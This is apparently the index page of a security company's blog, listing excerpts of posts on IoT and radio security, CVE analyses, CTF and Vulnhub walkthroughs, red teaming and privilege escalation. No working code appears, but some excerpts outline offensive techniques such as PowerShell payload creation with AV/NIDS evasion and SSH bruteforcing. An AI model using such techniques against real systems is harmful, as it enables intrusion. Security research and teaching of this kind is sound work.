Blog  |  

Stay up to date with Payatu blog

Blog   |  

Stay up to date with Payatu blog

Close the overlay

I am looking for
Please click one!

01 September 2020

IoT Security-Part 13 (Introduction to Hardware Recon)

IoT Security Part 13 (Introduction to Hardware Recon) This blog is part of the IoT Security series where we discuss the basic concepts pertaining to the IoT/IIoT eco-system and its security. If yo...

30 August 2020

IoT Security - Part 12 (MQTT Broker Security - 101)

MQTT Broker Security - 101 This blog is part of IoT Security series where we discuss the basic concepts pertaining to the IoT/IIoT eco-system and its security. If you have not gone through the pre...

27 August 2020

Ten Security Objectives To Consider While Building An IoT Or IIoT Product

Ten Security Objectives to consider while Building an IoT/IIoT product As calculated by former Cisco researcher David Evans, every second,

27 August 2020

10 Most Exploited Software From 2016 To 2020

10 most exploited Software from 2016 to 2020 US CERT has published the list of top 10 vulnerabilities that have been exploited between 2016 and 2020. Based on that, we have prepared the list of af...

27 August 2020

My hacking adventures with Safari reader mode

My hacking adventures with Safari reader mode Summary In March 2020, I wrote a blogpost on Executing Scripts In Safari Reader Mode To CSP Bypass, I had mentioned about the Safari reader mode a...

27 July 2020

IoT Security - Part 11 (Introduction To CoAP Protocol And Security)

This blog is part of the IoT Security series where we discuss the basic concepts pertaining to the IoT/IIoT eco-system and its security. If you have not gone through the previous blogs in the series, ...

12 July 2020

SEC4ML Part-2: Adversarial Machine Learning attacks

This is the SEC4ML subsection of the Machine Learning series. Here we will discuss potential vulnerabilities in Machine Learning applications. SEC4ML will cover attacks like Adversarial Learning, Mode...

12 July 2020

Intercepting request which requires VPN + socks proxy

Nowadays we often see that, to pentest an application first we have to connect into the client’s network and for which we have to set up the VPN connection. And only after that we can access the app...

26 June 2020

IoT Security - Part 10 (Introduction To MQTT Protocol and Security)

This blog is part of IoT Security series where we discuss the basic concepts pertaining to the IoT/IIoT eco-system and its security. If you have not gone through the previous blogs in the series, I wo...

25 June 2020

IoT Security – Part 9 (Introduction to software defined radio)

Introduction This blog is part of the “IoT Security” series. If you haven’t read the previous blogs (parts 1 - 8) in the series, I urge you to go through them first unless you are already fa...

24 June 2020

IoT Security – Part 8 (Introduction to software defined radio)

Introduction This blog is part of the “IoT Security” series. If you haven’t read the previous blogs (parts 1 - 7) in the series, I urge you to go through them first unless you are already fa...

19 June 2020

IoT Security - Part 7 (Reverse Engineering an IoT Firmware)

Introduction This blog is part of the “IoT Security” Series. If you haven’t read the previous blogs (parts 1 - 6) in the series, I urge you to go through them first unless you are already fa...

14 June 2020

Virtualizing ARM-Based Firmware Part - 2

Welcome to Part-2 of ARM firmware emulation blog series. If you haven’t gone through part 1 of Firmware Emulation, I would recommend to go through it. ARM system built during

11 June 2020

IoT Security – Part 5 (ZigBee Protocol - 101)

ZigBee Protocol 101 This blog is part of the “IoT Security” Series. If you haven’t read the previous blogs (part 1- 4) in the series, I urge you to go through them first unless you are alrea...

11 June 2020

IoT Security – Part 6 (ZigBee Security - 101)

ZigBee Security 101 This blog is part of the “IoT Security” Series. If you haven’t read the previous blogs (parts 1 - 5) in the series, I urge you to go through them first unless you are alr...

10 June 2020

Security and privacy of AI/ML applications - A layman's guide

Machine Learning(ML) is under exponential growth these days. Businesses, Academia and tech enthusiasts are really hyped about trying out ML to solve their problems. Students are driven to learn this n...

19 May 2020

Analysis of CVE-2020-11930: Reflected XSS in GTranslate WordPress module

Story: Few months back I was reading a security news on one of the famous news site, and by mistake I typed some characters in the URL and then the site responded with an obvious 404 page. At that tim...

11 May 2020

TrendNet Wireless Camera buffer overflow vulnerability

CVE Details ID : Description TrendNet ProVi...

29 April 2020

An analysis of Zoom’s take on Security & Privacy issues: Lockdown Edition

An analysis of Zoom’s take on Security & Privacy issues: Lockdown Edition Because of lockdown due to COVID-19 in most parts of the world, organizations are moving towards work from home culture....

29 April 2020

The Emerging $5 Trillion Economy to Receive a Cybersecurity Policy Upgrade in 2020

The Emerging $5 Trillion Economy to Receive a Cybersecurity Policy Upgrade in 2020 The National Security Council Secretariat sought suggestions and comments to form the National Cyber Security Str...

16 April 2020

A case of analysing encrypted firmware

Introduction Security analysis of the device firmware is a very crucial part of IoT Security Auditing. Obtaining firmware is amongst the many challenges of the analysis and there are tons of techn...

11 April 2020

How We Hacked an Android Game And Ranked First globally

How we hacked an Android game to top the global leaderboard without even playing the game. Recently, we came across an Android game of Minesweeper. The game has been nicely developed and was fun t...

08 April 2020

Navigating the High Cost of a Data Breach

Navigating the High Cost of a Data Breach In the first article in this two-part series, we covered the factors that add to the cost of a data breach, the parameters that play a role in increasing ...

08 April 2020

10 Most common security mistakes in development - My Experience

Nowadays, the security of the applications being used has become a significant concern for organizations, companies, and citizens in general, as they are becoming a more regular part of our daily live...

07 April 2020

Calculating the cost of a data breach

Calculating the cost of a data breach Data breaches eat away at customer trust, brand image, and the overall reputation of a company. By November 2019, 7.9 billion records had been exposed tied to...

28 March 2020

Executing scripts in Safari Reader Mode to CSP Bypass

Reading mode is a feature implemented in most browsers that allow users to read articles in a clutter-free view i.e rendering a page in a way that will be easy to read without any distraction. Her...

26 February 2020

That Evil Bookmark in your Browser

Sometime back, I decided to look at bookmarks API available for browser extensions. This API sounds interesting to me because it allows you to play with user bookmarks using browser extensions. If...

24 February 2020

Virtualizing ARM-Based Firmware Part - 1

Introduction Hello everyone, this blog demonstrates how to simulate/virtualize the ARM-based firmware in your system. This blog is for the people who are interested in IoT security and love playin...

18 February 2020

Hardware Attack - Stack Smashing And Protection

Stack exploitation based on buffer overflow has been one of the well-known security exploits. Refer for the basic u...

04 February 2020

massCode Code execution (CVE-2020-8548)

A few days back I was looking for a tool to maintain my notes and important code snippets and I came across a tool called massCode. About massCode massCode is one of the free and open-source c...

29 January 2020

Safari Address Bar Spoof (CVE-2020-3833)

In browsers, an address bar represents the current web address. Address bar spoof vulnerability It is an ability to keep legit URL in the address bar while loading the content from other domai...

13 January 2020

SEC4ML part-1: Model Stealing Attack on Locally Deployed ML Models

This is the SEC4ML subsection of the Machine Learning series. Here we will discuss potential vulnerabilities in Machine Learning applications. SEC4ML will cover attacks like Adversarial Learning, Mode...

08 January 2020

Must have Tools for Your Android Pentesting Toolkit

6 Must-have Tools for Your Android Pentesting Toolkit Hello, and Welcome everyone! When performing pentesting, either it is the web, network, mobile, or IoT, the most crucial thing the pentester s...

10 December 2019

Get pwned by scanning QR Code

One of the most common ways to navigate to a website or URLs is by typing website address in the browser address bar But this might be frustrating if you have to type a complex web address that in...

09 December 2019

Kubectl fields plugin

Introduction to Kubernetes is an open-source container orchestration system for automating application deployment, scaling, and management.

29 November 2019

CSAW CTF Finals 2018 1nsayne rev-250 writeup

1nsayne (rev-250) We are given a $ file 1nsayne 1nsayne: ELF 64-bit LSB executable, x86-64, version 1 (SYS...

29 November 2019

writing an llvm pass for ctfs

Motive With a couple of my friends I recently organized ctf. I authored 0bfusc8 much An RE chall that had 11 solves during the CTF and I got p...

05 July 2019

Token Stealing with Windows Update KB4054518

Tokens, Accounts, Processes: On a Windows system, there are various user accounts, some are default to Windows and some are created explicitly. Some of the default user accounts are Local Service, Network Service and so on. Apart from user accounts there are also groups like Users, Everyone etc. Using AccessChk [2] privileges ...

06 June 2019

microsoft edge extensions host-permission bypass (cve-2019-0678)

A browser extension is a plug-in that extends the functionality of a web browser....

13 March 2019

Introduction of Tcache bins in Heap management

Understanding glibc malloc Painless intro to the Linux userland heap understanding the glibc heap implementation Heap Exploitation ...

22 February 2019

6 Must have tools for your iOS pentesting toolkit

When performing a pentesting either it is web, network, mobile or IoT the essential thing the pentester should have is its tool. So in this blog, I am going to share the tools which I use to perform pentesting of iOS applications. 1. Cydia Impactor: Cydia Impactor is a GUI tool which is used to install the ios application into the iPhone when we have the IPA file of it. So if you have a jailbreak IPA then this tool is must which will let you install that jailbreak exploit IPA into your device. You can download Cydia from here. ...

01 January 2019


DIVA (Damn insecure and vulnerable App) is an App intentionally designed to be insecure....

14 December 2018

Raspberrypi as poor man’s hardware hacking tool

I have been wanting to write this blog for quite some time, either I was busy or lazy. I have been asked by so many people on the list of hardware to buy to get started with hardware hacking. To be honest, there are a lot of products available, but not many target beginners. In this blog i will cover about using SPI, I2C, JTAG/SWD and JTAGenum using Raspberry Pi. I will be using Raspberry pi zero w, as it is dead cheap and small. Setting up your Raspberry Pi Before you go into each section, I would suggest you boot into your raspberry pi and enable SPI, I2C, GPIO from the interfacing options in the raspi-config menu.  You can follow this link for setting up your Pi.  In all the connection pinouts, It is the hardware pin location and not the GPIO number. ...

30 November 2018

“MyMiko” – Responsible Vulnerability Disclosure

This is my another case of a vulnerable IoT device. In my previous blogs, we talked about vulnerabilities there was found in Smart lock and beacons. This one is a fun device, which is made for kids to learn to code and play with it. I don’t have access to the device, so I just checked on the mobile app and found series of vulnerability. These are my findings on a Connected smart toy – MyMiko by Emotix from their Android app. Findings 1: Hard Coded information in the android app It was identified on extracting the android app. several hard-coded information is present. These hard-coded information involves API calls, Web Endpoints and other information which could pose a threat. Steps:...

27 November 2018

“Find – Bluetooth Tracker” Responsible Vulnerability Disclosure – Blog

With the advent of IoT, everything is getting connected to the internet. Bluetooth is one such protocol which is used to connect devices to the internet as the most mobile device has Bluetooth Capability, you can check this blog on how to reverse a Bluetooth communication.  There are devices called Bluetooth beacons which are used to track devices which are in close proximity, companies have started connecting these beacons to the internet with geolocation and this is one such example. This is a case of my findings on a Smart Bluetooth Beacon from Sensegiz The testing was done on their Android Mobile Application. For User's privacy, the IP/End-Point is not disclosed. It will be replaced by xxx. Findings 1: Directory indexing...

22 October 2018

IoT Security – Part 4 (Bluetooth Low Energy – 101)

If you haven’t read through Part 1 to Part 3 of our IoT Security Blog series I would urge you to go through them first unless you are already familiar with the basics of IoT. Link to the previous blog – IoT security – Part 3 Bluetooth has been a buzz-word as people wanted all their devices to be smart and which basically implies that you get to control things across the devices and not needing to carry wire around. Bluetooth has been in the market for more than a decade. If you’re a millennial, you would have used those classic fancy Nokia phone which has Bluetooth in it. Bluetooth was invented by Ericsson and other vendors have started using Bluetooth. Soon after that, all the major vendors created a consortium called as Bluetooth Special Interest Group – SIG which governs how the standard should be and the interoperability between different versions. We are not going to talk about Bluetooth. Bluetooth by itself is a massive stack and their specification is around 2000+ pages.  In this blog, I will be covering only the Bluetooth Low Energy more famously known as BLE. With the advent of connecting all the things to the internet, there comes the problem of power and resource. As I mentioned early, Bluetooth is a huge stack. Implementing it in an end device like a fitness band would take more power and resource. So in the Bluetooth 4.0 standard, they introduced something called Low energy which is specially targeted for IoT and smart devices which runs on memory and power constrained devices. Bluetooth SIG started selling the standard as Bluetooth Smart. Which has two components, Bluetooth smart devices are end devices which have only the Bluetooth Low Energy component and Bluetooth smart Ready are the device which is capable of doing both the Bluetooth LE and the EDR-Bluetooth classic component which could be your central device, ie, mobile phone or laptop. ...

22 October 2018

Another case of a Vulnerable Smart Lock

  Disclaimer: The smart lock which i got is pretty common and it is even available in amazon. Several thousands devices are already in the market, I have changed the name of the brand to something imaginary – “*unhackable*” Smart Lock.     Smart Lock: The lock which i got is from a company called as *unhackable*, which is a chinese company . You also get the same lock locally from amazon. So people do use these devices. The specifications are good too.  ...

29 August 2018

RedTeaming from Zero to One – Part 1

Prologue This post is particularly aimed at beginners who want to dive deep into red teaming and move a step ahead from traditional penetration testing. It would also be helpful for Blue Teams/Breach Response Team/SOC analysts to understand the motive/methodology and match the preparedness of a Redteam or real-life adversary. It’s a summary of my experience when I decided to move into Redteaming. It’s a long post, so better grab a coffee and then continue reading this....

29 August 2018

RedTeaming from Zero to One – Part 2

In this part, we will cover Payload Creation, Payload delivery and AV/NIDS Evasion. 3. Payload Creation Empire gives us a variety of options to generate your Powershell agent which includes – exe, dll, Macro, HTA, bat, lnk, SCT, shellcode, bunny, ducky, etc Empire windows payload options Some payload creation Techniques: 3.1 One liner Powershell payload...

15 May 2018


My previous post discusses about an attempt we made to gain higher code coverage by leveraging some machine learning methodologies. I recommend you to read that post first, also you can take a look at this post to get a beginner level idea about machine learning. In previous experimentation have targeted JPEG and PDF parsers. The proposed system proved to work better for JPEG file generation than for PDF input generation. This is reasonable, since PDF parsers are syntactically more sensitive. Slight change in syntax will stop the parser from parsing the input. Hence previously proposed mutation technique resulted in decreased code coverage for generated PDFs. Long story short, we needed a system that learns the grammar/syntax from a corpus of sample inputs. In this post we will discuss an approach to overcome previously seen limitations. We will be targeting Adobe Acrobat Reader for experimentation. First we will take a look at PDF file specifications. Then the Deep Learning algorithms that can be used to infer grammar from a dataset. Finally we will inspect the quality of generated data based on the code coverage. Below mentioned system is integrated with CloudFuzz. Why machine learning? Fuzzing any software that accepts a highly syntactical input requires a grammar which can generate syntactically correct inputs. But designing a grammar is a tedious and time consuming process. Also, the created grammar is highly specific to that particular target software or might cover a very narrow spectrum of softwares. So, our target is to create a very generic system using Deep Learning. Which can be used to learn grammar from a set of samples and generate new inputs for fuzzing accordingly. Anatomy of a PDF file:...

12 April 2018

Expedition ML4SEC Part – 1

There is no doubt that state-of-the-art systems can be built using machine learning algorithms but at the same time these algorithm poses serious security flaws. An attacker can take advantage of these flaws by creating adversarial inputs resulting in misbehaviour of Machine Learning systems. In this series we will explore these flaws. But to understand about the vulnerabilities we first need to understand how machine learning models work. Hence, I will dedicate this post to understand the basics of machine learning and finish with building a basic machine learning model. Introduction: Training a machine learning model means increasing the performance of that model in a particular task. Model “Learns” from a dataset. Based on this learning process, machine learning algorithms are classified into following major types. Supervised learning: In supervised learning, we feed the algorithm with features and labels. Consider a problem of classifying network packets into malicious or non malicious. Here features could be the attributes of packet such as source IP, destination IP, port, protocol, payload length, flags,etc. And the labels could be 0 or 1 based based on whether the packet is malicious or not. Classification algorithms like Neural Nets and SVM. Unsupervised learning: This type of learning is used when we do not have a labeled samples. Algorithms learns to differentiate the samples based on the features. Suppose we have a huge set of images of 2 persons and want to classify them. Then we feed these images to an unsupervised algorithm. The algorithm will then create two or more clusters of these images(based on features), which can be labelled as person A and person B. Hence these algorithms are sometimes called as “clustering” algorithms. Semi-supervised learning: Semi-supervised learning is used when we have a mixture of labeled and unlabeled data in dataset....

20 February 2018

A guide to Linux Privilege Escalation

What is Privilege escalation? Most computer systems are designed for use with multiple users. Privileges mean what a user is permitted to do. Common privileges include viewing and editing files, or modifying system files. Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions. While organizations are statistically likely to have more Windows clients, Linux privilege escalation attacks are significant threats to account for when considering an organization’s information security posture. Consider that an organization’s most critical infrastructure, such as web servers, databases, firewalls, etc. are very likely running a Linux operating system. Compromises to these critical devices have the potential to severely disrupt an organization’s operations, if not destroy them entirely. Furthermore, Internet of Things (IoT) and embedded systems are becoming ubiquitous in the workplace, thereby increasing the number of potential targets for malicious hackers. Given the prevalence of Linux devices in the workplace, it is of paramount importance that organizations harden and secure these devices. Objective In this blog, we will talk in detail as what security issues could lead to a successful privilege escalation attack on any Linux based systems. We would also discuss as how an attacker can use the possible known techniques to successfully elevate his privileges on a remote host and how we can protect our systems from any such attack. At the end, examples would be demonstrated as how we achieved privilege escalation on different Linux systems under different conditions....

05 February 2018

Machine learning for effective fuzzing – CloudFuzz

  Problem: Fuzzing a software with random data may or may not discover new bugs. Also, such random attempts do not guarantee of covering the complete code. Hence there should be a system which learns the type and format of input files and generate similar files to attain higher code coverage. Since there could be countless number of file formats, our system should be highly generic and should work for every type of file format. It should not be bounded by a certain type of input. Eg: If the system is working for .doc files then it should also work for JPEGs or PDFs, etc.  ...

19 January 2018

IoT Security – Part 3 (101 – IoT Top Ten Vulnerabilities)

When talking about Top Ten vulnerabilities, the first thing that comes to our mind is OWASP. Why not, after all they are the pioneers in defining top 10 vulnerabilities for web and mobile. I’m an OWASP fan, simply because of the work the OWASP community has done over the years to define Application security issues, provide free tutorials and open source tools for the Industry to mitigate the risks and vulnerabilities. It would be highly unlikely that you haven’t heard of OWASP or read content from their website, however if you have not, I strongly suggest that you go through their website OWASP has also started the IoT security initiative where the community has defined the IoT attack surface and the IoT Top 10 vulnerabilities in addition to web and mobile. They are in the right direction and soon enough it will be an excellent place for IoT security content. The content relevant to the reader for IoT security on OWASP website is as follows: 1. OWASP Web Top 10 project: – 2. OWASP Mobile Top 10 Project: 3. OWASP Internet of things project:

15 January 2018

Understanding Stack based buffer overflow

What is stack? A stack is a limited access data structure – elements can be added and removed from the stack only at the top. It works on LIFO(last-in-first-out) principle. Stack supports two operations push and pop. Push: Adds an item to the top of the stack. Pop: Removes an item from the top of the stack. Now lets examine the memory layout of a c program especially stack, it’s content and it’s working during function call and return....

01 December 2017

Tiredful API Solution

The idea behind usage of the app is to consume the API-end points using RESTClient app such as Postman, Curl,ARC, RESTClient firefox add-on.For demonstration I am using RESTClient firefox add-on. Now, lets get started with main motto of this post – Solution to Tiredful API challenges. Solutions Information Disclosure First challenge in the list is “Information Disclosure”. From the following image you can see that API end point is <host>/api/v1/books/<ISBN>/ and use valid ids mentioned . ...

30 November 2017

CSV injection

In this write up we will be focusing on CSV injection. CSV also knows as Comma Separated Value stores tabular data (numbers and text) in plain text. Each record consists of one or more fields, separated by comma. Nowadays, there are many web application and frameworks being developed which allow users to export the data saved in database into a csv file. The csv file created might lead to CSV injection. So it becomes very important to be sure that the file exported through the web application is safe and will not leave the users system prone to any attack. CSV Injection aka Formula Injection. It occurs when websites embed untrusted user input inside CSV files without validating. When the user tries to open the CSV file using any spreadsheet program such as Microsoft Excel or LibreOffice Calc, any cells starting with ‘=’ will be interpreted by the software as a formula. Spreadsheet programs like Microsoft Excel, Open Office, Libre Office Calc are not a new programs. We have been using it to perform different task like calculation, analysis, and visualization of data and information. These software’s provide many formulas and functions which can be used by us in our day to day life. For example: Below image shows the Microsoft Excel allowing to add value of two field and display it in the third field....

22 November 2017

Getting Started with Radio Hacking – Part 2 – Listening to FM using RTL-SDR and GQRX

Welcome to the 2nd post in Radio Hacking series. I hope you have gone through the 1st part. If not please check Part-1. Also, I hope you have installed GQRX on your PC/LAPTOP. Let’s start. What we will learn – In this post, we will learn how to use GQRX along with RTL-SDR. We will be using RTL-SDR to receive FM signal for listening  a song. Tools – We will use RTL-SDR and GQRX. Please install GQRX on your PC/LAPTOP. What is RTL-SDR – RTL-SDR is a cheap USB dongle which can be used for “RECEIVING” Radio Signal. In our case, it will capture the FM signal. It’s price is around $20. RTL-SDR is also referred as RTL2832U, DVB-T SDR, RTL dongle or the “$20 Software Defined Radio”. There are many other software defined radios better than the RTL-SDR, but they all come at a higher price. RTL-SDR looks like this –...

22 November 2017

6 tools you need to be aware of if you are into device pentesting

IoT and smart devices are dominating the market at a tremendous rate. But with growing competition in the market, these devices often forgo proper standard and security procedures leadin g to attacks, including, Mirai botnet, reaper attack, and others that are yet to be discovered. The good news is these incidents have cautioned companies to take security testing more seriou sly. This has resulted in a host of security testers, developers and software security professionals getting into IoT penetration testing. ...

21 November 2017

CSAW CTF Finals 2017 WriteUps

Rabbithole Reversing rabbithole How far down the rabbit hole can you go?...

21 November 2017

How I Reverse Engineered and Exploited a Smart Massager

I have been working with Bluetooth for quite some time. I chose to reverse engineer a smart device to prove how crazy is the security standard being implemented in these smart devices. In this post, I will be showing you how I reverse engineered a Bluetooth based (Smart) Massager and how I could exploit it to make it lethal. Now how is a massager lethal? Massager works on a principle called as TENS — transcutaneous electrical nerve stimulation. Our entire nervous system works based on neural impulse, which is electric signals. Sense of p inch to the sense of orgasm is an electrical impulse which is going to secrete different hormones in your brain and you feel pain or pleasure....

09 October 2017

Authentication schemes in REST API

In simple terms, authentication means process of verifying the identity of a user. The process consist of simple steps, 1) User tries to connect to web services. 2) Web services asked user for credentials(Identity Information). 3) User provides credentials. 4)Web services verify the identity of the user by verifying provided credentials and responds accordingly....

08 September 2017

IoT Security – Part 2 (101 – IoT Attack surface)

Welcome! I hope you have gone through the previous blog post “IoT Security – Part 1” If not, I would urge you to go through it to understand the meaning of IoT and IoT architecture. Now we will start getting into security and try to define a way to understand and create a structured process to perform security research or penetration testing of IoT. If we look at the architecture defined in the previous post, it now becomes clear and easy for us to segregate the components of IoT and try to define the attack surface for each one of them individually and then combine them to create a holistic overview of the IoT ecosystem attack surface. I call it IoT ecosystem instead of IoT product because it indeed is an ecosystem of different components talking to each other and solving a particular real world problem. Let’s go ahead and define the attack surface of IoT ecosystem and discuss each component’s attack surface in detail. The attack surface by components can be divided into three or four( if we include communication as an attack surface) major areas as follows: Mobile Cloud Communication...

06 September 2017

Automating IVR pentesting

The call might get disconnected if you put some invalid DTMF value and you would have to make a call again and enter all those DTMF values manually to reach to that stage where you can enter a different payload. So, I thought of automating it because I couldn’t find any tool on the internet which can do this. Objective To develop a generic tool which can automate the IVR call flow and also automate the process of sending attack vectors through a interactive program so that it can save a pentester’s time. What is IVR? Interactive voice response (IVR) is a technology that allows a computer to interact with humans through the use of voice and DTMF tones input via keypad. In telecommunications, IVR allows customers to interact with a company’s host system via a telephone keypad or by speech recognition, after which services can be inquired about through the IVR dialogue. IVR systems can respond with prerecorded or dynamically generated audio to further direct users on how to proceed. Where it is used?...

04 September 2017

Vulnhub SickOs 1.2 – Walkthrough

The objective was to break into and read the flag kept under /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt Attacker’s IP is So lets start !!! 1. Started with netdiscover to locate the victim IP address. Victim was at 2. Scanned for open ports using nmap and found port 22 and 80 open. A lighttpd web server is running on port 80....

03 September 2017

Vulnhub Stapler – Walkthrough

on here. 1. First I tried checking the IP address using netdiscover. The victim appears to be sitting at The attacker machine is at 2. Next nmap helped us in checking the open ports and the respective services running. ...

01 September 2017

Kioptrix Level -1 Walkthrough

Unlike other walk-throughs, this will be a crisp manual. Without wasting much time I’d be showing the final steps and not go into the details of reconnaissance and failure steps. The VMs were hosted/setup up back in 2010 and while solving challenge 1, I ran into a couple of issues which I was able to eventually resolve. I downloaded the VM from here and using Virtual Box 4.3.36 on an Ubuntu host. Both victim machine (Kioptrix 1 VM) and attacker machine (Kali 2.0) are kept on “Host Only” network configuration. Attacker’s IP : In order to find the victim within the local network, we’ll be using netdiscover utility. Victim appears to be sitting at ...

31 August 2017

Dissecting GSM encryption and Location update process

Have you ever wondered as what happens when you turn on your mobile phone? How does it communicate to the network in a secure manner? Almost all of us would have read about TCP/IP and many of us would be experts in it but when it comes to telecom, very few know about how it actually works from inside. What’s the message structure in gsm? What kind of encryption it uses? So, today we will talking in detail about the encryption standards of gsm and how the mobile phone update it’s location to the mobile network. What happens when you turn on your cell phone? When you turn on your cell phone, It first initiates it’s radio resource and mobility management process. The phone receives a list of frequencies supported on the neighbouring cells either by the SIM or from the network. It camps on a cell depending upon the power level and the mobile provider. After that, It performs a location update process to the network where the authentication happens. After a successful location update, the mobile phone gets it’s TMSI and it is ready to do other operations now. Now, let’s verify the above statements by having a look at the mobile application debug logs. The below screenshots are from the osmocom mobile application which simulates a mobile phone working on a PC....

29 August 2017

Active analysis of a GSM call through osmocom-bb

In the last blog, we learnt how to do passive sniffing of gsm data using a RTL-SDR. I don’t wanna get much into what can be further done with passive analysis of GSM as it didn’t interest me much. Almost all of the operators now have upgraded their encryption standards, so sniffing GSM data using a USRP and cracking them using kraken is difficult now. There are other cost effective approaches that researches have used to crack and find the key(Kc) from the sniffed GSM data like running osmocom-bb on multiple phones and hopping channels to capture data or just by using a RTL-SDR. But today, we will focus on active analysis of GSM as that is more interesting and useful for research purpose. If you still want to know what can be done with just passive analysis of gsm data, you can read the tutorials released by srlabs on how to decrypt gsm data. They have done an awesome job on this. Objective We will intercept a gsm call in wireshark using Osmocom-BB and a motorola C118 phone and then we will analyze the GSM packets and learn what we can make out of it. What is Osmocom-BB?...

18 August 2017

Automating Stuff with Python

What is Automation? The use of any machine or computer to perform your task efficiently and in very less time can be termed as automation. Why do we need automated scripts? Humans can do great stuff, but sometimes we are too lazy to perform some. For example, if I ask you to multiply 345*246 most of you people will open calculator in your devices to calculate the result, rather than using pen paper to solve it. So using automated scripts make our task easy and is less time consuming. Ever wondered why do we need automated scripts is security testing? If so then the answer to your question is here. While performing security testing you can across a task that needs to be done multiple times like placing 1 lakh orders to check that the application can be flooded with multiple request. Now, sitting and creating each and every request manually will be a very tough job. So, here we can use automated scripts to perform our job....

10 August 2017

IoT Security – Part 1 (101 – IoT Introduction and Architecture)

The problem with every new and complex technology for security researchers is not knowing where to start and how/where to attack. This is a common problem and has a common solution i.e. breaking the technology into small components and start learning each component individually. This process makes you master each component and guides you to focus on the most interesting components according to the researcher. If you have read till here, I’m assuming you are going to stick around and read through. So, without any delay let’s start : ) . Note: 1. The information in this blog series is generic and can be applied to the security research of IoT products in any domain irrespective of their usage including Home automation, Industrial Control Systems, Healthcare, Transportation etc. 2. I will use the words device, hardware and sensor interchangeably to mean the same thing unless specifically mentioned with explanation. 3. I mention IoT ecosystem to mean an IoT product or a solution due to the nature of the IoT technology that comprises of different technologies. IoT != Hardware...

05 August 2017

OAuth Security Overview

In OAuth, “Auth” stands for Authorization as well as Authentication. Before OAuth, there were other authentication methods used to protect the user’s ID and password from other applications. When user accesses a secured web application it first verifies your identity by login us in and then it ensures that users have access only to data or functionality in the application which are authorized. So basic requirements are identity and permission for authentication and authorization. OAuth allowed an application to gain access to users data within another application without knowing the user login ID and password for the second application. When authentication by OAuth is performed, the service provider asks whether a user wants to authorize the request of the third-party application or it has their own authentication.   OAuth History...

24 July 2017

Getting started with Radio Hacking – Part 1 – Radio Frequency basics and theory

In this blog series, we will be learning about Radio Frequency (henceforth RF) theory, various modulation techniques and how to analyze them. Since the topic is huge, we will cover RF basics and theory in this part. Also, instead of using technical terms and definition, I will be using simple words to make you understand any topic/concept easily. Why we should study RF ?? – Internet of things – IoT, we all have heard this term right?? The popularity of IoT and all the devices getting connected wirelessly is imminent in today’s life. The majority of these devices will communicate with each other wirelessly using radio protocols ( frequency range ~ 3 kHz to 300 GHz). IoT devices use different Radio protocols such as ZigBee, RFID, Bluetooth etc. for communication. If we go back in time, many vulnerabilities have been found and exploited in IoT devices using some sort of radio communication. So, for pentesting IoT devices we need to have a strong foundation of various radio protocols, how they communicate and different modulation schemes they use for communication.  Thus, analyzing radio communication is of utmost importance from a security point of view and cannot be taken for granted. So let’s start....

14 July 2017

Writeup for inst_prof(pwn) from Google CTF 2017

Please help test our new compiler micro-service Challenge running at I don’t know what inst_prof means, it might be instruction profiler? idk. It was a pwn challenge. The challenge was tricky yet simple. Lets start. $ file inst_prof...

07 July 2017

Beginner’s Guide to RESTful API VAPT – Part 1

With more and more web applications are developed on top of the web services (RESTful API) many web application penetration tester are wondering exactly how to test these web services and what to actually look for. To help explain how to perform VAPT of REST API, let’s take a quick look at the basics of RESTful API. What is a RESTful API? Before understanding RESTful API let’s take a look at what the term REST actually mean. REST REST stands for REpresentational State Transfer which is a style of web architecture which describes six constraints. Uniform Interface...

07 July 2017

Beginner’s Guide to RESTful API VAPT – Part 2

You have got the basic concepts of REST API and how it is implemented. Now let’s get started with the main motto of this post i.e.How to perform VAPT of a REST API web service and what are different issues we should be looking. Finally, the Guide! REST API VAPT is somewhat similar to web application VAPT since we need to look for some standard vulnerabilities that we look for the web application such as SQL Injection, Access Control, XSS, CSRF, etc. Apart from these standard vulnerabilities, we need to look for API specific vulnerabilities also. Enumeration Before attacking any web service it is necessary to know from where you can start attacking. This can be tricky, finding attack surface for a web application is easy as we get GUI to examine different form fields, URLS, etc. But for API we only get API end point. In this stage we need to gather as much information as we can about the API’s endpoints, messages, parameters and behavior and technologies implemented. Following are some helpful points to gather information about the API end points. a) If client provides API programming documentation or configuration files, analyse it thoroughly check how user authentication process is implemented, check URL style used, check what are different standard HTTP headers and non-standard HTTP headers are required to interact with the API service and analyse the error codes and description to get clear idea about the valid range of values an API end point is accepting, how user authentication and authorisation is handled by web service....

03 July 2017

Reversing and Exploiting BLE 4.0 communication

Before we start, we need to understand first Bluetooth communication, there are 2 types Bluetooth communications, Classic Bluetooth i.e Bluetooth 2.0 Bluetooth Low energy i.e BLE 4.0 Actually, Classic Bluetooth specification started from Bluetooth 1.0 and 1.0B, these specifications are handled by SIG (Bluetooth Special Interest Group) and all Bluetooth manufacturers and service companies are a member of SIG....

26 June 2017

Firmware Visual Analysis Part-1

Firmware analysis gives more understanding about the embedded device and what it contains. It helps to, Identify vulnerabilities in the embedded device firmware. Improve product stability and resistance to attacks. Do security auditing...

16 June 2017

iOS app Runtime analysis using GDB

We have crafted a vulnerable iOS application for understanding and to learn to use GDB to perform runtime analysis, with our crafted vulnerable app known as ‘swizzle-me’. Introduction to the app. The app ‘swizzle-me’ is a simple authentication app, wherein the user is required to enter his/her valid credentials and get access to the application. App’s challenge:  Your task is to bypass this login mechanism of the application and access the authenticated page! ...

09 June 2017

Attacking interactive applications with python’s pexpect

While available shelf penetration programs/tools are used widely, there can be situations when certain tools might fail. Security Professionals love to automate pentesting tasks and write their own set of tools while testing. For example one can write his/her own port scanner program when nmap fails. Here a custom script would send packets to the static host and gives out result but how about the case when we are trying to attack an interactive service such as SSH, FTP, TELNET etc. Lets say we wish to bruteforce the ssh service on the remote machine and there are a series of prompts that are expected depending upon the interaction between client and ssh server. Lets check out some of the prompts ssh service sends to a connecting client – 1. When connecting to a ssh server for the first time, a yes/no prompt gets introduced. 2. While trying password....

02 June 2017

Passive GSM sniffing with Software defined radio

